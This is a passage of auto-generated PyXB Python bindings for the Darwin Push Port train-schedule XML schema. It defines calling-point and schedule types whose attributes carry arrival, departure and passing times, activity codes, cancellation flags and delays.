_ElementMap.update({
})
_AttributeMap.update({
__tpl.name() : __tpl,
__act.name() : __act,
__planAct.name() : __planAct,
__can.name() : __can,
__pta.name() : __pta,
__ptd.name() : __ptd,
__wta.name() : __wta,
__wtd.name() : __wtd,
__rdelay.name() : __rdelay,
__fd.name() : __fd
})
Namespace.addCategoryObject('typeBinding', 'IP', IP)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPIP with content type EMPTY
class OPIP (pyxb.binding.basis.complexTypeDefinition):
"""Defines an Operational Intermediate Calling Point"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'OPIP')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 181, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute tpl uses Python identifier tpl
__tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
__tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
__tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
# Attribute act uses Python identifier act
__act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default=' ')
__act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
__act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
act = property(__act.value, __act.set, None, 'Current Activity Codes')
# Attribute planAct uses Python identifier planAct
__planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
__planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
__planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
# Attribute can uses Python identifier can
__can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_can', pyxb.binding.datatypes.boolean, unicode_default='false')
__can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
__can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
can = property(__can.value, __can.set, None, 'Cancelled')
# Attribute wta uses Python identifier wta
__wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
__wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 186, 2)
__wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 186, 2)
wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
# Attribute wtd uses Python identifier wtd
__wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
__wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 191, 2)
__wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 191, 2)
wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
# Attribute rdelay uses Python identifier rdelay
__rdelay = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rdelay'), 'rdelay', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPIP_rdelay', _ImportedBinding_darwinpush_xb_ct.DelayValueType, unicode_default='0')
__rdelay._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 196, 2)
__rdelay._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 196, 2)
rdelay = property(__rdelay.value, __rdelay.set, None, "A delay value that is implied by a change to the service's route. This value has been added to the forecast lateness of the service at the previous schedule location when calculating the expected lateness of arrival at this location.")
_ElementMap.update({
})
_AttributeMap.update({
__tpl.name() : __tpl,
__act.name() : __act,
__planAct.name() : __planAct,
__can.name() : __can,
__wta.name() : __wta,
__wtd.name() : __wtd,
__rdelay.name() : __rdelay
})
Namespace.addCategoryObject('typeBinding', 'OPIP', OPIP)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}PP with content type EMPTY
class PP (pyxb.binding.basis.complexTypeDefinition):
"""Defines an Intermediate Passing Point"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'PP')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 202, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute tpl uses Python identifier tpl
__tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
__tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
__tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
# Attribute act uses Python identifier act
__act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default=' ')
__act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
__act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
act = property(__act.value, __act.set, None, 'Current Activity Codes')
# Attribute planAct uses Python identifier planAct
__planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
__planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
__planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
# Attribute can uses Python identifier can
__can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_can', pyxb.binding.datatypes.boolean, unicode_default='false')
__can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
__can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
can = property(__can.value, __can.set, None, 'Cancelled')
# Attribute wtp uses Python identifier wtp
__wtp = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtp'), 'wtp', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_wtp', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
__wtp._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 207, 2)
__wtp._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 207, 2)
wtp = property(__wtp.value, __wtp.set, None, 'Working Scheduled Time of Passing')
# Attribute rdelay uses Python identifier rdelay
__rdelay = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rdelay'), 'rdelay', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_PP_rdelay', _ImportedBinding_darwinpush_xb_ct.DelayValueType, unicode_default='0')
__rdelay._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 212, 2)
__rdelay._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 212, 2)
rdelay = property(__rdelay.value, __rdelay.set, None, "A delay value that is implied by a change to the service's route. This value has been added to the forecast lateness of the service at the previous schedule location when calculating the expected lateness of passing this location.")
_ElementMap.update({
})
_AttributeMap.update({
__tpl.name() : __tpl,
__act.name() : __act,
__planAct.name() : __planAct,
__can.name() : __can,
__wtp.name() : __wtp,
__rdelay.name() : __rdelay
})
Namespace.addCategoryObject('typeBinding', 'PP', PP)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}DT with content type EMPTY
class DT (pyxb.binding.basis.complexTypeDefinition):
"""Defines a Passenger Destination Calling point"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'DT')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 218, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute tpl uses Python identifier tpl
__tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
__tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
__tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
# Attribute act uses Python identifier act
__act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default=' ')
__act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
__act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
act = property(__act.value, __act.set, None, 'Current Activity Codes')
# Attribute planAct uses Python identifier planAct
__planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
__planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
__planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
# Attribute can uses Python identifier can
__can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_can', pyxb.binding.datatypes.boolean, unicode_default='false')
__can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
__can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
can = property(__can.value, __can.set, None, 'Cancelled')
# Attribute pta uses Python identifier pta
__pta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'pta'), 'pta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_pta', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
__pta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
__pta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
pta = property(__pta.value, __pta.set, None, 'Public Scheduled Time of Arrival')
# Attribute ptd uses Python identifier ptd
__ptd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'ptd'), 'ptd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_ptd', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
__ptd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
__ptd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
ptd = property(__ptd.value, __ptd.set, None, 'Public Scheduled Time of Departure')
# Attribute wta uses Python identifier wta
__wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
__wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 224, 2)
__wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 224, 2)
wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
# Attribute wtd uses Python identifier wtd
__wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType)
__wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 229, 2)
__wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 229, 2)
wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
# Attribute rdelay uses Python identifier rdelay
__rdelay = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rdelay'), 'rdelay', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_rdelay', _ImportedBinding_darwinpush_xb_ct.DelayValueType, unicode_default='0')
__rdelay._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 234, 2)
__rdelay._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 234, 2)
rdelay = property(__rdelay.value, __rdelay.set, None, "A delay value that is implied by a change to the service's route. This value has been added to the forecast lateness of the service at the previous schedule location when calculating the expected lateness of arrival at this location.")
_ElementMap.update({
})
_AttributeMap.update({
__tpl.name() : __tpl,
__act.name() : __act,
__planAct.name() : __planAct,
__can.name() : __can,
__pta.name() : __pta,
__ptd.name() : __ptd,
__wta.name() : __wta,
__wtd.name() : __wtd,
__rdelay.name() : __rdelay
})
Namespace.addCategoryObject('typeBinding', 'DT', DT)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPDT with content type EMPTY
class OPDT (pyxb.binding.basis.complexTypeDefinition):
"""Defines an Operational Destination Calling point"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'OPDT')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 240, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute tpl uses Python identifier tpl
__tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
__tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
__tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
# Attribute act uses Python identifier act
__act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default=' ')
__act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
__act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
act = property(__act.value, __act.set, None, 'Current Activity Codes')
# Attribute planAct uses Python identifier planAct
__planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
__planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
__planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
# Attribute can uses Python identifier can
__can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_can', pyxb.binding.datatypes.boolean, unicode_default='false')
__can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
__can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
can = property(__can.value, __can.set, None, 'Cancelled')
# Attribute wta uses Python identifier wta
__wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
__wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 245, 2)
__wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 245, 2)
wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
# Attribute wtd uses Python identifier wtd
__wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType)
__wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 250, 2)
__wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 250, 2)
wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
# Attribute rdelay uses Python identifier rdelay
__rdelay = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rdelay'), 'rdelay', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_rdelay', _ImportedBinding_darwinpush_xb_ct.DelayValueType, unicode_default='0')
__rdelay._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 255, 2)
__rdelay._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 255, 2)
rdelay = property(__rdelay.value, __rdelay.set, None, "A delay value that is implied by a change to the service's route. This value has been added to the forecast lateness of the service at the previous schedule location when calculating the expected lateness of arrival at this location.")
_ElementMap.update({
})
_AttributeMap.update({
__tpl.name() : __tpl,
__act.name() : __act,
__planAct.name() : __planAct,
__can.name() : __can,
__wta.name() : __wta,
__wtd.name() : __wtd,
__rdelay.name() : __rdelay
})
Namespace.addCategoryObject('typeBinding', 'OPDT', OPDT)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}Schedule with content type ELEMENT_ONLY
class Schedule (pyxb.binding.basis.complexTypeDefinition):
"""Train Schedule"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Schedule')
_XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 261, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OR uses Python identifier OR
__OR = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OR'), 'OR', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1OR', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 267, 4), )
OR = property(__OR.value, __OR.set, None, None)
# Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPOR uses Python identifier OPOR
__OPOR = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OPOR'), 'OPOR', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1OPOR', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 268, 4), )
OPOR = property(__OPOR.value, __OPOR.set, None, None)
# Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}IP uses Python identifier IP
__IP = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'IP'), 'IP', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1IP', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 269, 4), )
IP = property(__IP.value, __IP.set, None, None)
# Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPIP uses Python identifier OPIP
__OPIP = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OPIP'), 'OPIP', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1OPIP', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 270, 4), )
OPIP = property(__OPIP.value, __OPIP.set, None, None)
# Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}PP uses Python identifier PP
__PP = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PP'), 'PP', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1PP', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 271, 4), )
PP = property(__PP.value, __PP.set, None, None)
# Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}DT uses Python identifier DT
__DT = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'DT'), 'DT', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1DT', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 272, 4), )
DT = property(__DT.value, __DT.set, None, None)
# Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPDT uses Python identifier OPDT
__OPDT = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OPDT'), 'OPDT', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1OPDT', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 273, 4), )
OPDT = property(__OPDT.value, __OPDT.set, None, None)
# Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}cancelReason uses Python identifier cancelReason
__cancelReason = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'cancelReason'), 'cancelReason', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1cancelReason', False, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 275, 3), )
cancelReason = property(__cancelReason.value, __cancelReason.set, None, None)
# Attribute rid uses Python identifier rid
__rid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rid'), 'rid', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_rid', _ImportedBinding_darwinpush_xb_ct.RIDType, required=True)
__rid._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 277, 2)
__rid._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 277, 2)
rid = property(__rid.value, __rid.set, None, 'RTTI unique Train ID')
# Attribute uid uses Python identifier uid
__uid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'uid'), 'uid', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_uid', _ImportedBinding_darwinpush_xb_ct.UIDType, required=True)
__uid._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 282, 2)
__uid._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 282, 2)
uid = property(__uid.value, __uid.set, None, 'Train UID')
# Attribute trainId uses Python identifier trainId
__trainId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'trainId'), 'trainId', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_trainId', _ImportedBinding_darwinpush_xb_ct.TrainIdType, required=True)
__trainId._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 287, 2)
__trainId._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 287, 2)
